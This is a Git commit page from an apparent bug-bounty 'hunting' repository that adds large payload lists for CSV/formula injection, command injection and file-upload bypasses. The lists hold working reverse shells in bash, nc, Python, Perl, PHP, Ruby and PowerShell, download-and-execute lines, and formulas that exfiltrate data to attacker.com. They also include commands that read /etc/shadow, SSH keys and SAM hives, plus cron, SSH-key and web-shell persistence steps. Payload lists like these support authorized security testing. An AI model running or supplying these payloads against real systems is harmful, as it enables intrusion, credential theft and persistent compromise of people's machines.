0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #5 from Stalin-143/copilot/add-nomql-injections-and-payloads

Browse Source 
Add NoSQL, CSV, File Upload payloads, enhance Command Injection and XSS (2020-2025)
This commit is contained in:
Stalin
2026-01-05 01:26:48 +05:30
committed by GitHub
parent 39f9523829 18925b7301
commit 0e196714ca
9 changed files with 1996 additions and 24 deletions
Download Patch File Download Diff File Expand all files Collapse all files
CSV-Injection/README.md
+42
View File
@@ -0,0 +1,42 @@
# CSV Injection (Formula Injection)
## Description
CSV Injection (also known as Formula Injection) is a vulnerability that occurs when websites embed untrusted input inside CSV files. When a spreadsheet application (like Microsoft Excel, LibreOffice Calc, or Google Sheets) opens a CSV file containing malicious formulas, it may execute the formulas, leading to arbitrary command execution, information disclosure, or other attacks.
## Common Attack Vectors
- Export functionality (user data, reports, analytics)
- Contact forms that export to CSV
- User profile data exports
- Order history exports
- Any feature that generates downloadable CSV files
- Import/Export features in CRM systems
- Billing and invoice downloads
- Survey results exports
## Testing Approach
Submit formula characters (=, +, -, @, \t, \r) followed by commands or formulas in:
- Name fields
- Address fields
- Comment/description fields
- Any user-controllable data that might be exported to CSV
## Risk Impact
- Remote code execution via DDE (Dynamic Data Exchange)
- Information disclosure (reading local files)
- SSRF (Server-Side Request Forgery)
- Credential theft
- Malware distribution
## Common Vulnerable Patterns
- Direct export of user input to CSV without sanitization
- Missing CSV encoding/escaping
- Lack of formula character stripping
- Client-side only validation
## Payloads
See `csv-injection-payloads.txt` for a comprehensive list of CSV injection payloads covering:
- Formula injection techniques
- DDE (Dynamic Data Exchange) attacks
- Command execution payloads
- Data exfiltration methods
- Multi-application compatibility
CSV-Injection/csv-injection-payloads.txt
+328
View File
@@ -0,0 +1,328 @@
# CSV Injection Payloads (Formula Injection) - 2020-2025
# ============================
# Basic Formula Injection
# ============================
# Equals Formula
=1+1
=1+2+3
=SUM(1+1)
=2+5+cmd|' /C calc'!A0
="string"
=CMD|' /C powershell IEX(wget attacker.com/shell.ps1)'!A0
# Plus Formula
+1+1
+cmd|'/c calc'!A1
+DDE("cmd";"/c calc";"!")
# Minus Formula
-1+1
-cmd|'/c calc'!A1
-DDE("cmd";"/c calc";"!")
# At Symbol Formula
@sum(1+1)
@SUM(A1:A10)
# Tab Character
=1+1
+1+1
-1+1
@sum(1+1)
# Carriage Return
=1+1
+=1+1
# ============================
# DDE (Dynamic Data Exchange) Attacks
# ============================
# Basic DDE - Command Execution
=DDE("cmd";"/c calc";"!")
=DDE("cmd";"/c calc.exe";"!")
=DDE("cmd";"/c powershell";"!")
=DDE("cmd";"/c cmd";"!")
# DDE - File Reading
=DDE("cmd";"/c type C:\Windows\System32\drivers\etc\hosts";"!")
=DDE("cmd";"/c type C:\Users\*\Desktop\passwords.txt";"!")
=DDE("cmd";"/c dir C:\";"!")
# DDE - Information Disclosure
=DDE("cmd";"/c whoami";"!")
=DDE("cmd";"/c hostname";"!")
=DDE("cmd";"/c ipconfig";"!")
=DDE("cmd";"/c net user";"!")
=DDE("cmd";"/c systeminfo";"!")
# DDE - Data Exfiltration
=DDE("cmd";"/c curl http://attacker.com?data=$(whoami)";"!")
=DDE("cmd";"/c powershell -c Invoke-WebRequest -Uri http://attacker.com -Method POST -Body (Get-Content C:\passwords.txt)";"!")
=DDE("cmd";"/c certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe";"!")
# DDE - Reverse Shell
=DDE("cmd";"/c powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"";"!")
# ============================
# Excel HYPERLINK Function
# ============================
=HYPERLINK("http://attacker.com","Click here")
=HYPERLINK("http://attacker.com?cookie="&A1,"Click")
=HYPERLINK("file:///C:/Windows/System32/calc.exe","Click to update")
=HYPERLINK(CONCATENATE("http://attacker.com/",A1),"Link")
# ============================
# IMPORTXML / WEBSERVICE Functions
# ============================
=IMPORTXML("http://attacker.com/xxe.xml","//data")
=IMPORTXML(CONCAT("http://attacker.com?data=",A1),"//data")
=WEBSERVICE("http://attacker.com")
=WEBSERVICE(CONCAT("http://attacker.com?leak=",A1))
# ============================
# Obfuscation Techniques
# ============================
# Using CHAR function to hide commands
=CHAR(61)&"DDE(""cmd"";""/c calc"";""!"")"
=CONCATENATE(CHAR(61),"1+1")
=CHAR(61)&CHAR(68)&CHAR(68)&CHAR(69)&"(""cmd"";""/c calc"";""!"")"
# Using string concatenation
="="&"1+1"
=CONCATENATE("=","1+1")
="="&"DDE(""cmd"";""/c calc"";""!"")"
# Double encoding
==1+1
=+1+1
= =1+1
# Null byte injection
=1+1%00
=DDE("cmd";"/c calc";"!")%00
# Unicode characters
1+1
﹢1+1
⁼1+1
# Whitespace obfuscation
= 1+1
= 1+1
= 1+1
# ============================
# Cross-Application Payloads
# ============================
# LibreOffice Calc
=SHELL("calc")
=SHELL("gnome-calculator")
=SHELL("xterm -e bash")
=SHELL("wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh")
# Google Sheets
=IMAGE("http://attacker.com/track.png")
=IMAGE("https://attacker.com/"&A1)
=IMPORTDATA("http://attacker.com/data.csv")
=IMPORTFEED("http://attacker.com/feed")
=IMPORTHTML("http://attacker.com","table",1)
=IMPORTRANGE("spreadsheet-id","Sheet1!A1:B10")
# ============================
# Advanced Techniques (2023-2025)
# ============================
# Chained formulas
=IF(A1="admin",DDE("cmd";"/c calc";"!"),"safe")
=IF(ISNUMBER(SEARCH("admin",A1)),WEBSERVICE("http://attacker.com"),"")
# Nested functions
=SUM(DDE("cmd";"/c calc";"!"))
=CONCATENATE(DDE("cmd";"/c whoami";"!"))
# Conditional execution
=IF(1=1,DDE("cmd";"/c calc";"!"),1)
=IFERROR(DDE("cmd";"/c calc";"!"),1)
# ============================
# Context-Aware Payloads
# ============================
# Name field
=DDE("cmd";"/c calc";"!")
+DDE("cmd";"/c calc";"!")
-DDE("cmd";"/c calc";"!")
@DDE("cmd";"/c calc";"!")
# Email field
test@test.com=DDE("cmd";"/c calc";"!")
=WEBSERVICE("http://attacker.com")@test.com
# Comment field
Great product! =DDE("cmd";"/c calc";"!")
Review: +cmd|'/c calc'!A1
# ============================
# Payload Variations for WAF Bypass
# ============================
# Mixed case
=dDe("cmd";"/c calc";"!")
=DdE("cmd";"/c calc";"!")
# Alternative quotes
=DDE('cmd';'/c calc';'!')
=DDE(`cmd`;`/c calc`;`!`)
# Line breaks
=DDE("cmd";
"/c calc";
"!")
# Tabs and spaces
=DDE( "cmd" ; "/c calc" ; "!" )
# ============================
# Platform-Specific Payloads
# ============================
# Windows
=cmd|'/c calc'!A1
=cmd|'/c powershell -c "Start-Process calc"'!A1
=cmd|'/c mshta http://attacker.com/payload.hta'!A1
=cmd|'/c certutil -urlcache -split -f http://attacker.com/bad.exe bad.exe && bad.exe'!A1
=cmd|'/c wmic process call create "calc.exe"'!A1
=cmd|'/c reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'!A1
# Linux/Unix
=SHELL("calc")
=SHELL("xcalc")
=SHELL("xterm")
=SHELL("/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1")
=SHELL("curl http://attacker.com/shell.sh | bash")
=SHELL("nc attacker.com 4444 -e /bin/sh")
# macOS
=SHELL("open /Applications/Calculator.app")
=SHELL("osascript -e 'tell application \"Calculator\" to activate'")
=SHELL("curl http://attacker.com/payload.sh | sh")
# ============================
# Data Exfiltration Payloads
# ============================
# Exfiltrate cell data
=WEBSERVICE("http://attacker.com?data="&A1)
=HYPERLINK("http://attacker.com?token="&B2,"Update")
=IMAGE("http://attacker.com/track.gif?user="&C3)
# Exfiltrate multiple cells
=WEBSERVICE("http://attacker.com?u="&A1&"&p="&B1)
=CONCATENATE("http://attacker.com/",A1,"/",B1,"/",C1)
# ============================
# Denial of Service
# ============================
# Resource exhaustion
=SUM(1:1048576)
=IF(A1<>"",$A$1:$XFD$1048576,"")
=VLOOKUP(A1,$A$1:$XFD$1048576,1,FALSE)
# Circular references
=A1
# Note: When placed in cell A1 itself, this causes a circular reference error
# ============================
# Remote File Inclusion
# ============================
=IMPORTXML("http://attacker.com/xxe.xml","//data")
=IMPORTHTML("http://attacker.com/malicious.html","table",1)
=IMPORTFEED("http://attacker.com/rss")
=IMPORTDATA("http://attacker.com/data.txt")
# ============================
# XXE via CSV (when parsed as XML internally)
# ============================
=IMPORTXML("data:text/xml,<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&xxe;</foo>","//foo")
# ============================
# Social Engineering Payloads
# ============================
Please verify your account: =HYPERLINK("http://phishing.com","Click Here")
Congratulations! You won: =DDE("cmd";"/c calc";"!")
URGENT - Security Update Required =cmd|'/c powershell iex(wget attacker.com/malware.ps1)'!A1
Invoice #12345 =WEBSERVICE("http://attacker.com/log")
# ============================
# Polyglot Payloads
# ============================
=1+1';alert(document.domain)//
=DDE("cmd";"/c calc";"!")||'<script>alert(1)</script>
+cmd|'/c calc'!A1'"><img src=x onerror=alert(1)>
# ============================
# Null Cell Reference
# ============================
=A0
=DDE("cmd";"/c calc";"!")!A0
=cmd|'/c powershell'!A0
# ============================
# Format Confusion
# ============================
"=1+1"
'=1+1
`=1+1
´=1+1
# ============================
# Batch CSV Injection (Multiple Rows)
# ============================
# First row normal, second row malicious
Normal User,user@email.com,Regular Comment
Hacker,=DDE("cmd";"/c calc";"!"),Malicious
# ============================
# CSV Injection in Different Contexts
# ============================
# In URL parameters
?name==DDE("cmd";"/c calc";"!")
?search=+cmd|'/c calc'!A1
# In JSON (if converted to CSV)
{"name": "=DDE(\"cmd\";\"/c calc\";\"!\")"}
# In XML (if converted to CSV)
<name>=cmd|'/c calc'!A1</name>
# ============================
# Time-Delayed Payloads
# ============================
=IF(NOW()>DATE(2024,1,1),DDE("cmd";"/c calc";"!"),1)
=IF(TODAY()=WEEKDAY(1),WEBSERVICE("http://attacker.com"),1)
# ============================
# Modern Framework Specific (2024-2025)
# ============================
# When exported from web applications
=WEBSERVICE(CONCAT("http://attacker.com/?cookie=",CELL("filename")))
=HYPERLINK("javascript:alert(document.cookie)","click")
=@SUM(A1:A1000)*WEBSERVICE("http://attacker.com")
Command-Injection/command-injection-payloads.txt
+515 -23
View File
@@ -1,6 +1,10 @@
# Command Injection Payloads
# Command Injection Payloads (2020-2025 Enhanced Bug Bounty Edition)
# Basic command injection
# ============================
# BASIC COMMAND INJECTION
# ============================
# Command Separators
; ls
| ls
|| ls
@@ -8,73 +12,561 @@
&& ls
`ls`
$(ls)
%0a ls
\n ls
# Chained commands
# Chained Commands
; whoami
| whoami
|| whoami
& whoami
&& whoami
# Command substitution
# Command Substitution
`whoami`
$(whoami)
;`whoami`
;$(whoami)
$((whoami))
# File operations
# ============================
# LINUX/UNIX COMMANDS
# ============================
# File Operations
; cat /etc/passwd
| cat /etc/passwd
; cat /etc/shadow
| cat /etc/shadow
; ls -la
; ls -la /
| ls -la /
; head -n 50 /etc/passwd
; tail -n 50 /var/log/auth.log
# Windows commands
# System Information
; uname -a
; hostname
; id
; whoami
; pwd
; env
; set
; printenv
; cat /proc/version
; cat /etc/issue
; cat /etc/*-release
; ifconfig
; ip addr
; route -n
; netstat -tulpn
; ps aux
; w
; last
# File Discovery
; find / -name "*.conf" 2>/dev/null
; find / -name "config*" 2>/dev/null
; find / -name "*password*" 2>/dev/null
; find / -perm -4000 2>/dev/null
; locate password
; locate admin
; which gcc
; which python
; which perl
# Reading Sensitive Files
; cat ~/.bash_history
; cat ~/.ssh/id_rsa
; cat ~/.ssh/authorized_keys
; cat /var/www/html/config.php
; cat /var/www/html/wp-config.php
; cat /etc/apache2/apache2.conf
; cat /etc/nginx/nginx.conf
; cat /root/.ssh/id_rsa
# ============================
# WINDOWS COMMANDS
# ============================
# Basic Commands
& dir
| dir
& dir C:\
& type C:\Windows\win.ini
| type C:\boot.ini
& whoami
| net user
& hostname
& ipconfig
& systeminfo
# Time-based detection
# Windows System Info
& systeminfo
& wmic qfe list
& wmic logicaldisk get caption
& net user
& net localgroup administrators
& net user /domain
& net group /domain
& net group "Domain Admins" /domain
& tasklist
& netstat -ano
& ipconfig /all
& route print
& arp -a
# Windows File Operations
& type C:\Users\Administrator\Desktop\passwords.txt
& dir C:\Users\
& dir C:\inetpub\wwwroot\
& type C:\Windows\System32\drivers\etc\hosts
& reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
& reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# PowerShell Commands
& powershell Get-Process
& powershell Get-Service
& powershell Get-NetIPConfiguration
& powershell Get-ComputerInfo
& powershell Get-LocalUser
& powershell Get-LocalGroup
& powershell Get-ChildItem C:\ -Recurse -Include *.txt,*.doc,*.pdf -ErrorAction SilentlyContinue
& powershell -c "Get-Content C:\Users\Administrator\Desktop\passwords.txt"
# Windows Credential Dumping
& reg save HKLM\SAM C:\temp\sam.hive
& reg save HKLM\SYSTEM C:\temp\system.hive
& reg save HKLM\SECURITY C:\temp\security.hive
# ============================
# TIME-BASED BLIND INJECTION
# ============================
# Linux
; sleep 5
| sleep 5
& ping -n 5 127.0.0.1
| ping -c 5 127.0.0.1
; timeout 5
& timeout /t 5
|| sleep 5
& sleep 5
&& sleep 5
; sleep 10
`sleep 5`
$(sleep 5)
# Output redirection
# Using ping for delay
; ping -c 5 127.0.0.1
| ping -c 10 127.0.0.1
|| ping -c 5 localhost
# Windows
& timeout 5
| timeout 5
& timeout /t 5
& ping -n 5 127.0.0.1
| ping -n 10 127.0.0.1
& ping 127.0.0.1 -n 5 > nul
# ============================
# OUTPUT REDIRECTION & EXFILTRATION
# ============================
# Output to File
; ls > /tmp/output.txt
| ls > /tmp/output.txt
& dir > C:\temp\output.txt
; whoami > /var/www/html/whoami.txt
; cat /etc/passwd > /tmp/passwd.txt
# URL encoded
%3B%20ls
%7C%20ls
# Append to File
; ls >> /tmp/output.txt
; whoami >> /var/www/html/info.txt
# Error Redirection
; ls 2>&1
; cat /etc/shadow 2>/dev/null
; find / -name "*.conf" 2>/dev/null
# Data Exfiltration via HTTP
; curl http://attacker.com?data=$(whoami)
; wget http://attacker.com/exfil?data=$(cat /etc/passwd | base64)
; curl -d "data=$(cat /etc/passwd)" http://attacker.com/collect
& powershell -c "Invoke-WebRequest -Uri http://attacker.com?data=$(whoami) -Method GET"
# DNS Exfiltration
; nslookup $(whoami).attacker.com
; dig $(whoami).attacker.com
; host $(whoami).attacker.com
# ============================
# ENCODING & OBFUSCATION
# ============================
# URL Encoding
%3B%20whoami
%7C%20whoami
%26%20whoami
%0a%20whoami
%0d%0a%20whoami
# Double URL Encoding
%253B%2520whoami
%257C%2520whoami
# Unicode Encoding
\u003b whoami
# Hex Encoding
\x3b whoami
\x0a whoami
# Octal Encoding
\073 whoami
# ============================
# NEWLINE INJECTION
# ============================
# Newline injection
%0a whoami
%0d%0a whoami
\n whoami
\r\n whoami
\r whoami
%0awhoami
%0d%0awhoami
# Spaces bypass
# ============================
# SPACE BYPASS TECHNIQUES
# ============================
# No Space
;cat</etc/passwd
|cat</etc/passwd
{cat,/etc/passwd}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
cat$IFS$9/etc/passwd
cat${IFS}${PATH%%:*}
# Quotes bypass
# Brace Expansion
{cat,/etc/passwd}
{ls,-la,/}
# Tab Character
cat%09/etc/passwd
cat /etc/passwd
# Variable Expansion
X=$'cat\x20/etc/passwd'&&$X
IFS=,;`cat<<<cat,/etc/passwd`
# ============================
# FILTER BYPASS TECHNIQUES
# ============================
# Quotes Bypass
c'a't /etc/passwd
c"a"t /etc/passwd
c\at /etc/passwd
/b''i''n/c''at /etc/passwd
/\b\i\n/\c\a\t /etc/passwd
# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT)
; nc -e /bin/sh YOUR_IP PORT
| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
# Wildcards
/???/??t /???/??ss??
/bin/c?t /etc/p?sswd
/bin/ca* /etc/pass*
/b*n/c*t /e*c/p*wd
# Variable Substitution
$PATH
$HOME
$PWD
${PATH:0:1}
echo ${LS_COLORS:0:1}
# Concatenation
ca''t /etc/passwd
c""at /etc/passwd
c\a\t /etc/passwd
# Case Manipulation (Bash)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
# ============================
# COMMAND SUBSTITUTION VARIATIONS
# ============================
`whoami`
$(whoami)
$((whoami))
`echo $(whoami)`
$(echo `whoami`)
a=$(whoami);echo $a
a=`whoami`;echo $a
# ============================
# REVERSE SHELLS (FOR AUTHORIZED TESTING)
# ============================
# Bash Reverse Shell
; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
| bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'
; 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; sh <&196 >&196 2>&196
# NC Reverse Shell
; nc -e /bin/sh ATTACKER_IP PORT
; nc ATTACKER_IP PORT -e /bin/bash
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
# Python Reverse Shell
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Perl Reverse Shell
; perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# PHP Reverse Shell
; php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
# Ruby Reverse Shell
; ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# Telnet Reverse Shell
; telnet ATTACKER_IP PORT | /bin/bash | telnet ATTACKER_IP SECOND_PORT
# Windows PowerShell Reverse Shell
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Windows CMD Reverse Shell
& powershell IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')
# ============================
# REMOTE CODE EXECUTION (RCE)
# ============================
# Download and Execute
; curl http://attacker.com/shell.sh | bash
; wget http://attacker.com/shell.sh -O- | bash
; curl http://attacker.com/exploit.py | python
& certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe
& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
# Execute In-Memory
; echo "curl http://attacker.com/payload" | bash
& powershell -enc BASE64_ENCODED_COMMAND
# ============================
# SYMBOLIC LINK ATTACKS
# ============================
# Create Symlink to Sensitive Files
; ln -s /etc/passwd /var/www/html/passwd.txt
; ln -s /etc/shadow /tmp/shadow.txt
; ln -s /root/.ssh/id_rsa /var/www/html/key.txt
; ln -s /var/www/html/config.php /tmp/config.txt
# Symlink to Directory
; ln -s /etc/ /var/www/html/etc
; ln -s /root/ /tmp/root
; ln -s / /var/www/html/rootfs
# Symlink Overwrite
; ln -sf /etc/passwd /var/www/html/index.php
; ln -sf /dev/null /var/log/access.log
# Race Condition with Symlink
; ln -s /etc/passwd target && cat target
; ln -s /etc/shadow /tmp/link && cat /tmp/link
# Symlink Arbitrary File Read
; ln -s /etc/passwd public_html/passwd
; ln -s ~/.ssh/id_rsa web/key
# Symlink in Archive Extraction (Zip Slip)
; ln -s /etc/passwd malicious_link
; tar -czf payload.tar.gz malicious_link
# ============================
# BLIND COMMAND INJECTION DETECTION
# ============================
# Time-Based Detection
|| sleep 5
& sleep 5 &
; ping -c 5 127.0.0.1
| timeout 5
# Out-of-Band (OOB) Detection
; curl http://burpcollaborator.net
; wget http://attacker.com/ping
; nslookup attacker.com
; ping attacker.com -c 1
& nslookup attacker.com
# DNS-Based Detection
; nslookup $(whoami).attacker.com
; dig $(whoami).attacker.com
; host $(hostname).attacker.com
# HTTP-Based Detection
; curl http://attacker.com/?id=injection
; wget http://attacker.com/?test=injection
# ============================
# POLYGLOT COMMAND INJECTION
# ============================
test;whoami
test|whoami
test||whoami
test&whoami
test&&whoami
test`whoami`
test$(whoami)
test%0awhoami
test\nwhoami
# ============================
# ADVANCED FILTER BYPASSES (2023-2025)
# ============================
# Whitespace Alternatives
cat</etc/passwd
cat<>/etc/passwd
{cat,/etc/passwd}
X=$'cat\x20/etc/passwd'&&$X
# Null Byte
cat /etc/passwd%00
whoami%00
# Comment Injection
cat /etc/passwd#comment
whoami#comment
cat /etc/passwd//comment
# Using $PATH
${PATH:0:1}bin${PATH:0:1}cat ${PATH:0:1}etc${PATH:0:1}passwd
# Using $HOME
$HOME/../../etc/passwd
# Glob Characters
/???/c?t /???/p?ssw?
# ============================
# WAF/IDS BYPASS
# ============================
# Case Variations
Cat /etc/passwd
CAT /etc/passwd
cAt /etc/passwd
# Using Tabs
cat%09/etc/passwd
# Using Line Feed
cat%0a/etc/passwd
# Combining Techniques
c''a''t${IFS}/e''t''c/p''a''s''s''w''d
# ============================
# CONTEXT-SPECIFIC INJECTIONS
# ============================
# In Email Field
user@domain.com; whoami
user@domain.com| whoami
user@domain.com`whoami`
# In Filename
file.txt; whoami
file.txt| cat /etc/passwd
$(whoami).txt
# In URL
http://example.com/page?id=1; whoami
http://example.com/page?id=1| cat /etc/passwd
# ============================
# CRON JOB INJECTION
# ============================
# Persistent Access
; (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'") | crontab -
; echo "* * * * * curl http://attacker.com/shell.sh | bash" | crontab -
# ============================
# SSH KEY INJECTION
# ============================
# Add SSH Key for Persistence
; echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys
; mkdir -p ~/.ssh && echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys
# ============================
# BACKDOOR INSTALLATION
# ============================
# Web Shell Upload
; curl http://attacker.com/shell.php -o /var/www/html/shell.php
; wget http://attacker.com/backdoor.php -O /var/www/html/bd.php
# Binary Download and Execute
; curl http://attacker.com/backdoor -o /tmp/bd && chmod +x /tmp/bd && /tmp/bd
; wget http://attacker.com/malware -O /tmp/malware && chmod +x /tmp/malware && /tmp/malware &
# ============================
# PRIVILEGE ESCALATION CHECKS
# ============================
# SUID Binaries
; find / -perm -4000 -type f 2>/dev/null
; find / -perm -u=s -type f 2>/dev/null
# Sudo Permissions
; sudo -l
; cat /etc/sudoers
# Writable Files
; find / -writable -type f 2>/dev/null
; find / -perm -222 -type f 2>/dev/null
# ============================
# LOG POISONING
# ============================
# Apache/Nginx Log Poisoning
; echo "<?php system(\$_GET['cmd']); ?>" >> /var/log/apache2/access.log
; echo "<?php system(\$_GET['cmd']); ?>" >> /var/log/nginx/access.log
# ============================
# ENVIRONMENT VARIABLE MANIPULATION
# ============================
; export PATH=/tmp:$PATH
; echo $PATH
; printenv
# ============================
# MODERN TECHNIQUES (2024-2025)
# ============================
# Abusing Built-in Features
; source <(curl -s http://attacker.com/script.sh)
; eval "$(curl -s http://attacker.com/cmd.txt)"
# JavaScript Command Injection (Node.js)
; node -e "require('child_process').exec('whoami')"
# Using Alternative Shells
; sh -c whoami
; bash -c whoami
; zsh -c whoami
; ksh -c whoami
# Exploiting Interpreters
; python -c "import os;os.system('whoami')"
; perl -e 'system("whoami")'
; ruby -e 'system("whoami")'
File-Upload/README.md
+73
View File
@@ -0,0 +1,73 @@
# File Upload Vulnerabilities
## Description
File upload vulnerabilities occur when a web application allows users to upload files without properly validating the file type, content, or destination. Attackers can exploit these vulnerabilities to upload malicious files, leading to remote code execution (RCE), arbitrary file read/write, cross-site scripting (XSS), and other attacks.
## Common Attack Vectors
- Profile picture upload
- Document upload features
- Resume/CV upload
- Image galleries
- File sharing functionality
- Import/export features
- Backup/restore functionality
- Plugin/theme upload (CMS)
- Attachment features
## Testing Approach
Test various file upload bypasses:
- Extension bypasses (double extensions, case variations, null bytes)
- Content-Type manipulation
- Magic byte manipulation
- Polyglot files (valid image + valid code)
- Archive file manipulation (zip, tar)
- Path traversal in filenames
- File overwrite attacks
- XXE via SVG/XML files
## Risk Impact
- **Remote Code Execution (RCE)** - Upload and execute web shells
- **Cross-Site Scripting (XSS)** - Upload HTML/SVG files with JavaScript
- **Path Traversal** - Overwrite critical files
- **Denial of Service** - Upload large files, zip bombs
- **Information Disclosure** - Read sensitive files
- **Defacement** - Overwrite web pages
- **Malware Distribution** - Host malicious files
## Common Vulnerable Patterns
- Blacklist-based file type validation (instead of whitelist)
- Client-side only validation
- Inadequate Content-Type checking
- Missing magic byte validation
- Predictable upload paths
- Executable permissions on upload directories
- Lack of file size limits
- No antivirus scanning
## File Extensions to Test
**Web Shells & RCE:**
- PHP: `.php`, `.php3`, `.php4`, `.php5`, `.php7`, `.phtml`, `.phar`, `.phpt`, `.pgif`, `.pht`
- ASP: `.asp`, `.aspx`, `.asa`, `.asax`, `.ascx`, `.ashx`, `.asmx`, `.cer`, `.config`
- JSP: `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
- Perl: `.pl`, `.pm`, `.cgi`, `.lib`
- Python: `.py`, `.pyc`, `.pyw`
- Ruby: `.rb`, `.rbw`
- Other: `.shtml`, `.shtm`, `.phar`, `.inc`
**Script Files:**
- `.js`, `.vbs`, `.bat`, `.cmd`, `.ps1`, `.sh`
**Server Config:**
- `.htaccess`, `.htpasswd`, `.web.config`, `.conf`
## Payloads
See `file-upload-payloads.txt` for comprehensive payloads including:
- Extension bypass techniques
- Content-Type bypasses
- Magic byte manipulation
- Polyglot file examples
- Web shell payloads (PHP, ASP, JSP)
- XSS via file upload
- Path traversal in filenames
- XXE via SVG/XML uploads
- Archive-based attacks
File-Upload/file-upload-payloads.txt
+652
View File
@@ -0,0 +1,652 @@
# File Upload Vulnerability Payloads (2020-2025 Bug Bounty Tested)
# ============================
# FILE EXTENSION BYPASSES
# ============================
# Double Extensions
shell.php.jpg
shell.php.png
shell.php.gif
shell.php.pdf
shell.php.txt
shell.jpg.php
shell.png.php
exploit.asp.jpg
exploit.aspx.png
backdoor.jsp.gif
# Case Variations
shell.PHP
shell.PhP
shell.pHp
shell.Php
shell.PHp
shell.ASP
shell.ASPX
shell.AsP
shell.JSP
# Null Byte Injection (older systems)
shell.php%00.jpg
shell.php%00.png
shell.php\x00.jpg
shell.asp%00.gif
exploit.jsp%00.pdf
# Special Characters
shell.php.....
shell.php%20
shell.php%0a
shell.php%00
shell.php%0d%0a
shell.php::$DATA
shell.php::$INDEX_ALLOCATION
# Alternate Extensions (PHP)
shell.php3
shell.php4
shell.php5
shell.php7
shell.phtml
shell.phar
shell.phpt
shell.pgif
shell.pht
shell.inc
shell.hphp
shell.ctp
# Alternate Extensions (ASP/ASPX)
shell.asp
shell.aspx
shell.asa
shell.asax
shell.ascx
shell.ashx
shell.asmx
shell.cer
shell.config
shell.soap
shell.rem
# Alternate Extensions (JSP)
shell.jsp
shell.jspx
shell.jsw
shell.jsv
shell.jspf
# Other Language Extensions
shell.pl
shell.pm
shell.cgi
shell.py
shell.pyc
shell.rb
shell.rbw
shell.sh
shell.bash
# Executable Extensions
malware.exe
backdoor.bat
script.cmd
payload.ps1
reverse.sh
# Server Config Files
.htaccess
.htpasswd
web.config
httpd.conf
.user.ini
php.ini
# ============================
# CONTENT-TYPE BYPASSES
# ============================
# Common Content-Type Headers to Test:
# Legitimate looking but with malicious content
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Content-Type: image/bmp
Content-Type: image/svg+xml
Content-Type: application/pdf
Content-Type: application/zip
Content-Type: text/plain
Content-Type: text/csv
Content-Type: application/octet-stream
Content-Type: video/mp4
Content-Type: audio/mpeg
# Empty or null
Content-Type:
Content-Type: null
Content-Type: undefined
# Malformed
Content-Type: image/jpeg; charset=binary
Content-Type: multipart/form-data; boundary=something
